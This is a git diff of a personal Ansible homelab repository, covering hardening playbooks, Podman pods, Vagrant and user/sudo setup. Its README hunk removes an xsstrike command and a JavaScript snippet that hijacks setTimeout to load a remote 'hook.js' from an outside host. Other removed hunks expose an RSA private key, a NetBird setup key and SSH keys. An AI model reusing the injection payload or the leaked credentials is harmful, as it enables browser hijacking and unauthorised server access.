diff --git a/README.md b/README.md index 19c2558..df57862 100644 --- a/README.md +++ b/README.md @@ -1,25 +1,21 @@ # semaphore ``` - python3 xsstrike.py -u https://147.135.51.88/login -(function() { - const originalSetTimeout = window.setTimeout; - window.setTimeout = function(fn, delay) { - if (delay > 0) { - const wrapped = function() { - if (!window.xetLoaded) { - var s = document.createElement('script'); - s.src = 'https://xet.jingoh.fr/hook.js'; - document.head.appendChild(s); - window.xetLoaded = true; - } - return fn.apply(this, arguments); - }; - return originalSetTimeout(wrapped, delay); - } - return originalSetTimeout(fn, delay); - }; -})(); + +# hardening + +https://github.com/linux-system-roles/sudo => ansible-galaxy role install linux-system-roles.sudo +singleplatform-eng.users +dev-sec.os_hardening : +dev-sec.ssh_hardening : +geerlingguy.firewall : +jnv.unattended-upgrades + + +# apps stacks + +https://github.com/alvistack/ansible-role-podman => installation podman +https://github.com/linux-system-roles/podman => manager pod like Kubernetes / services ``` @@ -40,83 +36,3 @@ Add - package - firewall - - -flux bootstrap gitea --owner=staffadmin --repository=cluster --private=false --personal=true --path=./clusters/test --hostname gitea.jingoh.fr --read-write-key=true - -GITEA_TOKEN=fdsfsd - -==> delete secret in flux-system - -┌─[stephane@staff] - [~] - [2024-08-28 01:05:37] -└─[130] <> flux bootstrap gitea --owner=staffadmin --repository=cluster --private=true --personal=true --path=clusters/test --hostname gitea.jingoh.fr --token-auth -► connecting to gitea.jingoh.fr -► cloning branch "main" from Git repository "https://gitea.jingoh.fr/staffadmin/cluster.git" -✔ cloned repository -► generating component manifests -✔ generated component manifests -✔ component manifests are up to date -► installing components in "flux-system" namespace -✔ installed components -✔ reconciled components -► determining if source secret "flux-system/flux-system" exists -► generating source secret -► applying source secret "flux-system/flux-system" -✔ reconciled source secret -► generating sync manifests -✔ generated sync manifests -✔ sync manifests are up to date -► applying sync manifests -✔ reconciled sync configuration -◎ waiting for GitRepository "flux-system/flux-system" to be reconciled -✗ gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': authorization failed' -◎ waiting for Kustomization "flux-system/flux-system" to be reconciled -✗ client rate limiter Wait returned an error: context deadline exceeded -► confirming components are healthy -✔ helm-controller: deployment ready -✔ kustomize-controller: deployment ready -✔ notification-controller: deployment ready -✔ source-controller: deployment ready -✔ all components are healthy -✗ bootstrap failed with 2 health check failure(s): [error while waiting for GitRepository to be ready: 'gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': authorization failed'', error while waiting for Kustomization to be ready: 'client rate limiter Wait returned an error: context deadline exceeded - - - - - -┌─[stephane@staff] - [~] - [2024-08-28 01:13:04] -└─[1] <> flux bootstrap gitea --owner=staffadmin --repository=cluster --private=true --personal=true --path=clusters/test --hostname gitea.jingoh.fr --token-auth -► connecting to gitea.jingoh.fr -► cloning branch "main" from Git repository "https://gitea.jingoh.fr/staffadmin/cluster.git" -✔ cloned repository -► generating component manifests -✔ generated component manifests -✔ component manifests are up to date -► installing components in "flux-system" namespace -✔ installed components -✔ reconciled components -► determining if source secret "flux-system/flux-system" exists -► generating source secret -► applying source secret "flux-system/flux-system" -✔ reconciled source secret -► generating sync manifests -✔ generated sync manifests -✔ sync manifests are up to date -► applying sync manifests -✔ reconciled sync configuration -◎ waiting for GitRepository "flux-system/flux-system" to be reconciled -✗ gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': Get "https://gitea.jingoh.fr/staffadmin/cluster.git/info/refs?service=git-upload-pack": dial tcp: lookup gitea.jingoh.fr on 10.43.0.10:53: server misbehaving' -◎ waiting for Kustomization "flux-system/flux-system" to be reconciled -✗ client rate limiter Wait returned an error: context deadline exceeded -► confirming components are healthy -✔ helm-controller: deployment ready -✔ kustomize-controller: deployment ready -✔ notification-controller: deployment ready -✔ source-controller: deployment ready -✔ all components are healthy -✗ bootstrap failed with 2 health check failure(s): [error while waiting for GitRepository to be ready: 'gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': Get "https://gitea.jingoh.fr/staffadmin/cluster.git/info/refs?service=git-upload-pack": dial tcp: lookup gitea.jingoh.fr on 10.43.0.10:53: server misbehaving'', error while waiting for Kustomization to be ready: 'client rate limiter Wait returned an error: context deadline exceeded'] - - - - -# docker run -d -p 127.0.0.1:8000:8080 -e DATA_ROOT=/DATA -v /DATA:/DATA -v /var/run/docker.sock:/var/run/docker.sock --name casaos casaos \ No newline at end of file diff --git a/Vagrantfile b/Vagrantfile index e6df6ff..b773b59 100644 --- a/Vagrantfile +++ b/Vagrantfile @@ -1,29 +1,16 @@ -# -*- mode: ruby -*- -# vi: set ft=ruby : - -NNODES=2 - -$script = <<-SCRIPT -echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClVS1uxDfwS6OusQ4qgcZ6hBc8YRBE8MyXu0sUfGN7S3itjI3W2ixD18v80el8dVQVR12jCY0ueavgoV1cHrfGWkFoLKi+QrA4MuSNUChj0NBbyLTmdwPvne8LRv3ttCbRSJ/6bIEveX8y/7kGn/R1NDFlfE6b5R8ersBUKCQM6YxblAkv/XH8cJlQXhr1nLhVOl/ae+Q/pTCbgioB8qrmGEuMvOLmavcFf7IJbJcSgeiXSOnyIRl2n64X6lbRK+MRZ61pF6vAOXA+Ixyt/fAbO7sjqU0+cEhU5Br5/VcqG4Bc5nhWimtXIHPry3aLV5PtN6K9/i3eA5F6Jpa82JzmUMEbWSBIga02yIw9GjRyAI6ccH/kJGuB6QN5/YwGHpOF2f0FGiEAbUz41mLngN3SsXL1pdV2hT3x56/GIcGe6p/f1cytwVCyOaE7W87B05w5JYb1sSFj6QuGW0rHWfnHT5SY87Mk/H8VgZPaPbm+hSjLIQRAmUYQR+Rub1o9bXE=" >> /home/vagrant/.ssh/authorized_keys -SCRIPT - -# All Vagrant configuration is done below. The "2" in Vagrant.configure -# configures the configuration version (we support older styles for -# backwards compatibility). Please don't change it unless you know what -# you're doing. Vagrant.configure("2") do |config| - (0..NNODES - 1).each do |i| - config.vm.define "k8s-ubuntu-#{i}" do |node| - #node.vm.box = "ubuntu/focal64" - node.vm.box = "ubuntu/jammy64" - node.vm.hostname = "k8s-ubuntu-#{i}" - config.vm.provider "virtualbox" do |v| - v.memory = 2048 - v.cpus = 2 - end - node.vm.network "private_network", ip: "192.168.25.11#{i}" - node.vm.provision "shell", inline: $script - node.vm.provision "shell", inline: "echo hello from node #{i}" - end + config.vm.box = "generic/ubuntu2204" + config.vm.network "private_network", type: "dhcp" + # config.vm.network :hostonly, "192.168.1.21" + config.vm.synced_folder ".", "/vagrant", disabled: true + config.vm.provider "qemu" do |qe| + qe.qemu_dir = "/usr/bin/" + qe.arch="x86_64" + qe.memory = "2048" + qe.smp = "4" + qe.machine = "q35" + qe.cpu = "max" + qe.net_device = "virtio-net-pci" end -end \ No newline at end of file +end + diff --git a/collections/requirements.yml b/collections/requirements.yml index adadbd9..3c2cab1 100644 --- a/collections/requirements.yml +++ b/collections/requirements.yml @@ -5,8 +5,9 @@ collections: # - name: ansible.utils # # - name: community.grafana - name: community.docker - #! bitwarden - name: bitwarden.secrets + - name: devsec.hardening + - name: fedora.linux_system_roles # - name: community.general # # - name: geerlingguy.redis # # - name: git+https://github.com/netways/ansible-collection-elasticstack.git diff --git a/files/swarm/config/traefik-dynamic-configuration.yml b/files/swarm/config/traefik-dynamic-configuration.yml deleted file mode 100644 index 610cba6..0000000 --- a/files/swarm/config/traefik-dynamic-configuration.yml +++ /dev/null @@ -1,4 +0,0 @@ -tls: - certificates: - - certFile: /run/secrets/wildcard-jingoh-private.crt - keyFile: /run/secrets/wildcard-jingoh-private.key \ No newline at end of file diff --git a/files/swarm/tls/jingoh.private.crt b/files/swarm/tls/jingoh.private.crt deleted file mode 100644 index a46aab1..0000000 --- a/files/swarm/tls/jingoh.private.crt +++ /dev/null @@ -1,22 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIDrzCCApegAwIBAgIUKJ9Qnulnmv91wS0XQXuFAAJTLOkwDQYJKoZIhvcNAQEL -BQAwcTELMAkGA1UEBhMCRlIxFzAVBgNVBAgMDklsZXMtZGUtZnJhbmNlMQ4wDAYD -VQQHDAVQYXJpczEPMA0GA1UECgwGamluZ29oMQ8wDQYDVQQLDAZqaW5nb2gxFzAV -BgNVBAMMDmppbmdvaC5wcml2YXRlMB4XDTI0MDQxNzE5MDIxMloXDTM0MDQxNTE5 -MDIxMlowcTELMAkGA1UEBhMCRlIxFzAVBgNVBAgMDklsZXMtZGUtZnJhbmNlMQ4w -DAYDVQQHDAVQYXJpczEPMA0GA1UECgwGamluZ29oMQ8wDQYDVQQLDAZqaW5nb2gx -FzAVBgNVBAMMDmppbmdvaC5wcml2YXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A -MIIBCgKCAQEAuvwbT5XwP4wOhPLubWk7KBdt1+taFV/YNIkx+Ky9Nb+eceJ8iYXm -Xy9bRK0WTdTiwOLC60h3WigsMMPc8sI1FiW3jfHMU8Z2GqJTHFM6CP1LcN+LpKZZ -f8pZu3ONMhTcaPGvGYH+GAdi8Qk7rRskirZlImsA6lGDoteKKF/Xc4Y6IoIxIZ7X -SK7klO/qN0ZPHWiu9QAtNBc4vVZEz83aXEbKH7eCOtSz07cOIT6yrvUF11225Y0e -nn+DOLEcBBwI5KLco0udERz/Epn90eUWgbibP4QIaVQJypFC17RU3fXkiqZjb0Qy -B2WEYi8awyB6KgZfu1PvzuvHYuKugBeYVwIDAQABoz8wPTAJBgNVHRMEAjAAMBsG -A1UdEQQUMBKCECouamluZ29oLnByaXZhdGUwEwYDVR0lBAwwCgYIKwYBBQUHAwEw -DQYJKoZIhvcNAQELBQADggEBAJ2hJ5SW9TD9yLecxG++x/jl32oxYJ/EyDPXZNHw -fAb+9YmniThDEJTJ2RJTOIhZz6uqdjfP+37sFDu17SMvxauG78RIYSaTGnIaoiXt -v5Uh4apUR1DOOPoZoUX82ZQJEJ5LenO+EFHevYbzgcDW61T/oByPwK8FOtLqQMHe -SC09WsGyLQ/hls+4EgxQFyl7UN5T9NK6xrQrHwNbV0IgHcnGcTSkzRj4mt1nzsdh -Enq/Ztz9iefxqDvHPFRRtcqDv+Ozh7zSuxVfP3tb7+5Ak7j/0Txi5NAbo+F3opAD -8eeY2dTgxc9sV1esvB305zgl4SUkfLD+BDjOjn/NvWFj2i0= ------END CERTIFICATE----- \ No newline at end of file diff --git a/files/swarm/tls/jingoh.private.key b/files/swarm/tls/jingoh.private.key deleted file mode 100644 index bc9b8cd..0000000 --- a/files/swarm/tls/jingoh.private.key +++ /dev/null @@ -1,27 +0,0 @@ ------BEGIN RSA PRIVATE KEY----- -MIIEowIBAAKCAQEAuvwbT5XwP4wOhPLubWk7KBdt1+taFV/YNIkx+Ky9Nb+eceJ8 -iYXmXy9bRK0WTdTiwOLC60h3WigsMMPc8sI1FiW3jfHMU8Z2GqJTHFM6CP1LcN+L -pKZZf8pZu3ONMhTcaPGvGYH+GAdi8Qk7rRskirZlImsA6lGDoteKKF/Xc4Y6IoIx -IZ7XSK7klO/qN0ZPHWiu9QAtNBc4vVZEz83aXEbKH7eCOtSz07cOIT6yrvUF1122 -5Y0enn+DOLEcBBwI5KLco0udERz/Epn90eUWgbibP4QIaVQJypFC17RU3fXkiqZj -b0QyB2WEYi8awyB6KgZfu1PvzuvHYuKugBeYVwIDAQABAoIBACqQz4rLgDiHIpsD -TmGbzfqvcrLvgb9R5T74aGbKs/vzVhdozp7j23CZsDYvDN/E8aWlOWgkQ/9DG+Qy -Ai9FJJ6ZEXL/s1ry19nyT+cnzxNSzgSw7vIZaFBd+RViFadr9kzxj8HHxNclf1GN -n4cloajuIpG2OCwfSE8er/XG8535cc7aErTpuhj5EoqRtYy++VkiC0d3VSaCE/uW -J1ulfGnaZ3qiJfr6o+0xlTPYFcK5pkm+3uvTdSYZeLSSJPfnnaqx7G8yxoVZ1QaH -3Sey4Ax1Y8vGYtbJ2ZS7NlnBgbgSDPGimZMFfoGFThK4Y5AcqGIEByZvOSByXnQ6 -tHiB6OECgYEA3KJIThM+RtwAk17MoRvkdUl+iPj0k+Go7lJQycFgCeNfp2rylqYm -K1/Hzo0rSueVVRO3iL+clxt3bYHHNk62nJnp+nnkAaETTs9A8QRwGk418BKw9HyR -faSrmXkTgKlY+sWrwECP9SyLa80UPyWIyIeOqb/zvjfirRRaPRFQTrECgYEA2PUI -HYSqia+iOm4XEOtlUMHbNnLhW/aFhBingABt/CMO0cPTCCYdEzS+xDZzF7MROHzd -O6zJyLUtenTIwN3dcVTWCPCRxcAY4p6V/PjV0c/b0vteQ4WWFM/l6ubTAwX+uJih -SQREkqseMPLAqeEX84yZfqb/N3s2N2GuGIbP6YcCgYEAsztlz38UbU3VbeJqC0r0 -WU896pmLXgLIT+ow1OUxVncOQpu/vB/3C+9ACoxlqfDdQALHauB1nc9jQmNV6Mki -0a67A443ahdm7vOwhtqbEtOMP51/gO0c59t4xzEzZaassPMZphEMoRfxnr43f2DH -cFemzkEwCcuuafoJoGhLO9ECgYA2yAg4i9sT0QlBf7LLTuTSM2DKqs9EjUbBSAhj -Rbh/xcpkJPIQSK9mvha9LJJ7FXfvr3edLc/1oenN1dcq+9qCV02EDFqCeDLQZgKx -UZOL2tRCvb3bhsuSjbwcSBRX2xeqPL/c0/sMnbCN433KZ0/I62OGm1wuAip6aWuw -PboZ2QKBgFaEqOCUFMGHet0A/BOGkzkpCZsXl+EDqvx9l7s30vdv2NIoNR8V+Zl3 -B2arO/jGjDZnbGJcHG6B7WrCX8aJyM7Fm9akbreL7lWWzqKXs1lDHwAxqQN/TllI -tO5XRx7AHoJXkEmzKAwQWAbKzRKLTp0x9lcOBGz8CR29oPxZI2/H ------END RSA PRIVATE KEY----- \ No newline at end of file diff --git a/group_vars/all.yml b/group_vars/all.yml index a23c8d2..c040cff 100644 --- a/group_vars/all.yml +++ b/group_vars/all.yml @@ -1,38 +1,54 @@ #* USERS +users: + - username: bot + name: bot user + # groups: ['wheel','systemd-journal'] + # uid: 1000 + home: /home/bot + # profile: | + # alias ll='ls -lah' + ssh_key: + - "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK7/ReeTsubS/KwTRaR/5k/6d5CEef0XTXvyRwfVBjwW" + - username: dbtest + name: dbtest user + # groups: ['wheel','systemd-journal'] + # uid: 1000 -management_user_list: - - name: stephane - shell: '/bin/bash' - authorized_keys: - - key: "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClVS1uxDfwS6OusQ4qgcZ6hBc8YRBE8MyXu0sUfGN7S3itjI3W2ixD18v80el8dVQVR12jCY0ueavgoV1cHrfGWkFoLKi+QrA4MuSNUChj0NBbyLTmdwPvne8LRv3ttCbRSJ/6bIEveX8y/7kGn/R1NDFlfE6b5R8ersBUKCQM6YxblAkv/XH8cJlQXhr1nLhVOl/ae+Q/pTCbgioB8qrmGEuMvOLmavcFf7IJbJcSgeiXSOnyIRl2n64X6lbRK+MRZ61pF6vAOXA+Ixyt/fAbO7sjqU0+cEhU5Br5/VcqG4Bc5nhWimtXIHPry3aLV5PtN6K9/i3eA5F6Jpa82JzmUMEbWSBIga02yIw9GjRyAI6ccH/kJGuB6QN5/YwGHpOF2f0FGiEAbUz41mLngN3SsXL1pdV2hT3x56/GIcGe6p/f1cytwVCyOaE7W87B05w5JYb1sSFj6QuGW0rHWfnHT5SY87Mk/H8VgZPaPbm+hSjLIQRAmUYQR+Rub1o9bXE= stephane" - exclusive: yes - sudo: - hosts: ALL - as: ALL - commands: ALL - nopasswd: ALL - - -#* GO - -golang_gopath: /usr/local/go -# golang_download_dir: /home/stephane/.ansible/tmp/downloads +sudo_sudoers_files: + - path: /etc/sudoers.d/bot + user_specifications: + - users: + - bot + hosts: + - ALL + operators: + - ALL + commands: + - "NOPASSWD: ALL" #* PACKAGES package_repo: - python3-pip - #! argocd control plane - - sshpass + - podman + - lsof +# - libsemanage + +# package_pip: +# - python3-libsemanage + #* FIREWALL firewall_allowed_tcp_ports: - "22" + - "2222" - "80" + - "8080" - "443" - "9100" + - "32222" # #! Kubernetes control plane ports # - "6443" # - "2379" @@ -43,23 +59,4 @@ firewall_allowed_tcp_ports: # - "9090" # - "3000" # - "9323" -#! Kubernetes Worker ports - - - -#* NETBIRD - -netbird_setup_key: 33BE5022-D0CF-4ED9-84FF-B93E53519FDD -netbird_register: true - -#* TLS - -node_exporter_tls_server_config: - cert_file: /etc/node_exporter/tls.cert - key_file: /etc/node_exporter/tls.key - -#* NODE_EXPORTER - -# node_exporter_basic_auth_users: -# randomuser: examplepassword -node_exporter_web_listen_address: "{{ host_private_address }}:9100" +#! Kubernetes Worker ports \ No newline at end of file diff --git a/hardening-linux.yml b/hardening-linux.yml index d155ad4..9aa43bf 100644 --- a/hardening-linux.yml +++ b/hardening-linux.yml @@ -1,11 +1,34 @@ -- hosts: all +- hosts: localtest + #! Need first setup with root access user become: true - roles: - # #! need change for iphone ssh access - # - name: devsec.hardening.ssh_hardening - # #! be carefull - # - name: devsec.hardening.os_hardening + pre_tasks: + - ansible.builtin.apt: + update_cache: yes -# - community.general.ufw: -# state: enabled -# policy: allow \ No newline at end of file + - ansible.builtin.apt: + name: "*" + state: latest + + - ansible.builtin.apt: + upgrade: safe + + - ansible.builtin.apt: + clean: yes + + - ansible.builtin.apt: + name: "{{ item }}" + state: latest + loop: "{{ package_repo }}" + when: package_repo is defined + + - ansible.builtin.pip: + name: "{{ item }}" + loop: "{{ package_pip }}" + when: package_pip is defined + + roles: + - name: singleplatform-eng.users + - name: linux-system-roles.sudo + - name: devsec.hardening.ssh_hardening + - name: devsec.hardening.os_hardening + - name: geerlingguy.firewall \ No newline at end of file diff --git a/hosts b/hosts index 2ab34f7..da6c469 100644 --- a/hosts +++ b/hosts @@ -4,6 +4,9 @@ scaleway ansible_host=163.172.84.28 ansible_user=stephane [tower] scaleway ansible_host=163.172.84.28 ansible_user=stephane +; [localtest] +; #! test ansible_host=ubuntu.orb.local ansible_user=ansible ansible_ssh_private_key_file=~/.orbstack/ssh/id_ed25519 #! First setup +; test ansible_host=ubuntu.orb.local ansible_user=bot ansible_ssh_private_key_file=~/.orbstack/ssh/id_ed25519 ; [local] ; localhost ansible_host=127.0.0.1 ansible_user=stephanegratias ; [cluster] diff --git a/podman.yml b/podman.yml new file mode 100644 index 0000000..5b6b393 --- /dev/null +++ b/podman.yml @@ -0,0 +1,138 @@ +- hosts: localtest + become: true + vars: + #! SECRETS + # vaultwarden_url: "{{ lookup('env', 'vaultwarden_url') }}" + # bw_client_secret: "{{ lookup('env', 'bw_client_secret') }}" + # bw_client_password: "{{ lookup('env', 'bw_client_password') }}" + # bw_client_id: "{{ lookup('env', 'bw_client_id') }}" + # user_mail: "{{ lookup('env', 'mail') }}" + # user: "{{ lookup('env', 'username') }}" + # # Token full access gitea + # bw_requested_password_id: "{{ lookup('env', 'bw_requested_password_id') }}" + #! PODS + # podman_registries_conf: + # aliases: + # myregistry: quay.io + # podman_registry_username: test + # podman_registry_password: test + podman_create_host_directories: true + # podman_firewall: + # - port: 8080-8081/tcp + # state: enabled + # - port: 12340/tcp + # state: enabled + # podman_selinux_ports: + # - ports: 8080-8081 + # setype: http_port_t + podman_kube_specs: + - state: started + run_as_user: bot + run_as_group: bot + kube_file_content: + apiVersion: v1 + kind: Pod + metadata: + name: db + spec: + containers: + - name: db + image: docker.io/mysql:9 + ports: + - containerPort: 1234 + hostPort: 12340 + volumeMounts: + - mountPath: /var/lib/db:Z + name: db + volumes: + - name: db + hostPath: + path: /var/lib/db + # podman_secrets: + # - name: mysql-root-password-container + # state: present + # skip_existing: true + # data: "{{ root_password_from_vault }}" + # - name: mysql-root-password-kube + # state: present + # skip_existing: true + # data: | + # apiVersion: v1 + # data: + # password: "{{ root_password_from_vault | b64encode }}" + # kind: Secret + # metadata: + # name: mysql-root-password-kube + # - name: envoy-certificates + # state: present + # skip_existing: true + # data: | + # apiVersion: v1 + # data: + # certificate.key: {{ key_from_vault | b64encode }} + # certificate.pem: {{ cert_from_vault | b64encode }} + # kind: Secret + # metadata: + # name: envoy-certificates + # - state: started + # run_as_user: webapp + # run_as_group: webapp + # kube_file_src: /path/to/webapp.yml + +#! SECRETS + pre_tasks: + - name: Install Bitwarden CLI + ansible.builtin.command: + cmd: "{{ item }}" + delegate_to: localhost + loop: + - apk add --no-cache nodejs npm + - npm install -g @bitwarden/cli + + - ansible.builtin.command: + cmd: bw logout + delegate_to: localhost + ignore_errors: true + + - name: bitwarden token session + ansible.builtin.shell: "{{ item }}" + environment: + BW_CLIENTID: "{{ bw_client_id }}" + BW_CLIENTSECRET: "{{ bw_client_secret }}" + BW_PASSWORD: "{{ bw_client_password }}" + loop: + - bw config server {{ vaultwarden_url }} + - bw login --apikey + - bw unlock --passwordenv BW_PASSWORD --raw + delegate_to: localhost + register: bw_session_result + + - name: Get secret from Bitwarden + command: + argv: + - bw + - get + - password + - "{{ bw_requested_password_id }}" + - --session + - "{{ bw_session_result.results[-1].stdout | trim }}" + delegate_to: localhost + register: gitea_token_result + no_log: true + changed_when: false + + # - name: Return all secrets from a path + # ansible.builtin.debug: + # msg: "{{ gitea_token_result.stdout }}" + # delegate_to: localhost + + - ansible.builtin.set_fact: + gitea_token : "{{ gitea_token_result.stdout | trim }}" + no_log: true + delegate_to: localhost + +#! ROLES + roles: + #! By default, the files will be copied to or created in /etc/containers/systemd/$name.$type for root containers + #! and $HOME/.config/containers/systemd/$name.$type for rootless containers, on the managed node. + - name: linux-system-roles.podman \ No newline at end of file diff --git a/roles/.gitignore b/roles/.gitignore index 2b44480..8bec64d 100644 --- a/roles/.gitignore +++ b/roles/.gitignore @@ -47,4 +47,12 @@ cloudalchemy.grafana CTL-Fed-Security.ansible-grafana thomasjpfan.docker-swarm asg1612.dockerswarm -gantsign.golang \ No newline at end of file +gantsign.golang +singleplatform-eng.users +linux-system-roles.sudo +devsec.hardening.os_hardening +devsec.hardening.ssh_hardening +geerlingguy.firewall +alvistack.podman +linux-system-roles.podman +linux-system-roles.selinux \ No newline at end of file diff --git a/roles/requirements.yml b/roles/requirements.yml index b62fd7f..aba7997 100644 --- a/roles/requirements.yml +++ b/roles/requirements.yml @@ -13,6 +13,19 @@ # - src: geerlingguy.kubernetes # PIP - src: geerlingguy.pip +#! USER +- src: singleplatform-eng.users +- src: linux-system-roles.sudo +#! HARDENING => collection +# - src: devsec.hardening.os_hardening +# - src: devsec.hardening.ssh_hardening +- src: geerlingguy.firewall +- src: linux-system-roles.selinux +#! PODS +- src: alvistack.podman +- src: linux-system-roles.podman +# - src: fedora.linux_system_roles.firewall +# jnv.unattended-upgrades # - src: asg1612.dockerswarm # SYSTEM # - src: tumf.systemd-service diff --git a/screenshots/http---23.134.94.44-32132.jpeg b/screenshots/http---23.134.94.44-32132.jpeg deleted file mode 100644 index 97b9a60..0000000 Binary files a/screenshots/http---23.134.94.44-32132.jpeg and /dev/null differ diff --git a/templates/alerts.sh.j2 b/templates/alerts.sh.j2 deleted file mode 100644 index 838f95d..0000000 --- a/templates/alerts.sh.j2 +++ /dev/null @@ -1,63 +0,0 @@ -#!/bin/bash - -# Monitoring script - -# Secrets -username="{{ alert_username }}" -password="{{ alert_password }}" -VAULT="{{ alert_vault }}" - -# Servers -servers=({{ alert_list_server | join (' ') }}) -local_ip=$(hostname -I | awk '{print $1}') - -# SSL -site="{{ alert_server_ssl }}" - -# Vérifier s'il y a un paramètre -if [ $# -ne 1 ]; then - echo "Usage : $0 [storage|load|ping|health|ssl|backup_git|backup_vault|cpu]" - exit 1 -fi - -# Récupérer le paramètre -parametre="$1" - -# Vérifier la valeur du paramètre et afficher le résultat correspondant -if [ "$parametre" = "storage" ]; then - [ $(df -h / | awk 'NR==2 {sub(/%/, "", $(NF-1)); print $(NF-1)}') -gt 80 ] && curl -u "$username:$password" -H "Title: Full Storage" -H "ta:card_index_dividers" -d "90% used on `hostname`" https://alert.jingoh.fr/{{ alerts_storage }} -elif [ "$parametre" = "load" ]; then - [ $(uptime | awk -F'load average: ' '{print $2}' | awk '{print $1}' | cut -d , -f1) '>' $(nproc) ] && curl -u "$username:$password" -H "Title: Load" -H "ta:battery" -d "`hostname` Load with `uptime`" https://alert.jingoh.fr/{{ alerts_load }} -elif [ "$parametre" = "ping" ]; then - for ip in "${servers[@]}" - do - if [ "$ip" != "$local_ip" ]; then - ping -c 1 "$ip" || curl -u "$username:$password" -H "Title: Ping Server" -H "ta:sos" -d "Server ping failed from `hostname` to $ip" https://alert.jingoh.fr/{{ alerts_ping }} - fi - done -elif [ "$parametre" = "health" ]; then - [ $(curl -s -o /dev/null -w "%{http_code}" https://gitea.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service gitea" -H "ta:bangbang" -d "No response From gitea.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }} - [ $(curl -s -o /dev/null -w "%{http_code}" https://vault.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service vault" -H "ta:bangbang" -d "No response From vault.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }} - [ $(curl -s -o /dev/null -w "%{http_code}" https://homepage.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service homepage" -H "ta:bangbang" -d "No response From homepage.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }} -elif [ "$parametre" = "ssl" ]; then - expiration_timestamp=$(date -d "$(echo | openssl s_client -servername $site -connect $site:443 2>/dev/null | openssl x509 -noout -enddate | cut -d "=" -f 2)" +%s) - current_timestamp=$(date +%s) - difference=$((expiration_timestamp - current_timestamp)) - threshold=$((20 * 24 * 3600)) # 20 jours en secondes - if [ $difference -lt $threshold ]; then - curl -u "$username:$password" -H "Title: HTTPS Certificats" -H "ta:closed_lock_with_key" -d "*.jingoh.fr Less than 20 days" https://alert.jingoh.fr/{{ alerts_ssl }} - fi -elif [ "$parametre" = "backup_git" ]; then - docker exec -u git -w /data/ gitea gitea dump -c /data/gitea/conf/app.ini - mv /opt/dockerapps/appdata/gitea/gitea/gitea-dump-*.zip /opt/dockerapps/backup/ - docker exec gitea-db pg_dump -U root gitea > gitea-db-pg.sql - mv ./gitea-db-pg.sql /opt/dockerapps/backup/ - curl -u "$username:$password" -H "Title: Backup gitea" -H "ta:inbox_tray" -d "Local Backup gitea done !" https://alert.jingoh.fr/{{ alerts_backup_gitea }} -elif [ "$parametre" = "backup_vault" ]; then - docker run --rm --volumes-from=vault -e UID=0 -e BACKUP_DIR=/data/backup -e TIMESTAMP=true -e ENCRYPTION_PASSWORD="$VAULT" bruceforce/vaultwarden-backup manual - curl -u "$username:$password" -H "Title: Backup vault" -H "ta:inbox_tray" -d "Local Backup vault done !" https://alert.jingoh.fr/{{ alerts_backup_vault }} -elif [ "$parametre" = "cpu" ]; then - [ "$(echo "$(ps -eo %cpu --sort=-%cpu | awk 'NR>1 { sum += $1 } END { print sum }') > $(nproc) * 50" | bc)" -eq 1 ] && curl -u "$username:$password" -H "Title: CPU `nproc` cores" -H "ta:warning" -d "High usage `ps -eo %cpu --sort=-%cpu | awk 'NR>1 { sum += $1 } END { print sum }'`" https://alert.jingoh.fr/{{ alerts_cpu }} -else - echo "Paramètre invalide : Utilisez [storage|load|ping|health|ssl|backup_git|backup_vault|cpu]" -fi diff --git a/templates/docker-compose.yml.j2 b/templates/docker-compose.yml.j2 deleted file mode 100644 index a293c66..0000000 --- a/templates/docker-compose.yml.j2 +++ /dev/null @@ -1,2 +0,0 @@ -# {{ ansible_managed }} -{{ dockerapp_compose | to_nice_yaml(indent=3) }} \ No newline at end of file